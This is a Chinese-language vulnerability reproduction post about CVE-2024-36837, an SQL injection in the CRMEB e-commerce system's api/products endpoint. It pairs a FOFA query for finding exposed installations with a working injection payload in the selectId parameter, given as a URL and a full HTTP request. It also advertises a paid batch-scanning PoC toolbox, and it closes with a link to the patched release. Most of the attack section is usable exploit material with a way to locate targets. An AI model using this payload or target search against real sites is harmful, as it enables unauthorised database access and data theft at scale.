CRMEB电商系统api/products存在SQL注入漏洞CVE-2024-36837 附POC
CRMEB电商系统api/products存在SQL注入漏洞CVE-2024-36837 附POC
南风漏洞复现文库 南风漏洞复现文库 2024-06-19 23:07
免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
1. CRMEB电商系统简介
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发
CRMEB是一套开源的电商管理系统
2.漏洞描述
CRMEB是一套开源的电商管理系统。CRMEB v.5.2.2版本存在安全漏洞,该漏洞源于存在SQL注入漏洞,允许远程攻击者通过ProductController.php文件中的getProductList函数获取敏感信息。
CVE编号:CVE-2024-36837
CNNVD编号:CNNVD-202406-361
CNVD编号:
3.影响版本
CRMEB电商系统
CRMEB电商系统api/products存在SQL注入漏洞
4.fofa查询语句
body=”/wap/first/zsff/iconfont/iconfont.css” || body=”CRMEB”
5.漏洞复现
漏洞链接:https://xx.xx.xx.xx.xx/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(1)))),0x7e),3550)
漏洞数据包:
GET /api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(1)))),0x7e),3550) HTTP/1.1
Host: xxx.xxx.x9.237
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Connection: Keep-Alive
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Priority: u=1, i
6.POC&EXP
本期漏洞及往期漏洞的批量扫描POC及POC工具箱已经上传知识星球:南风网络安全1: 更新poc批量扫描软件,承诺,一周更新8-14个插件吧,我会优先写使用量比较大程序漏洞。2: 免登录,免费fofa查询。3: 更新其他实用网络安全工具项目。4: 免费指纹识别,持续更新指纹库。
7.整改意见
打补丁 https://github.com/crmeb/CRMEB/releases/tag/v5.3.0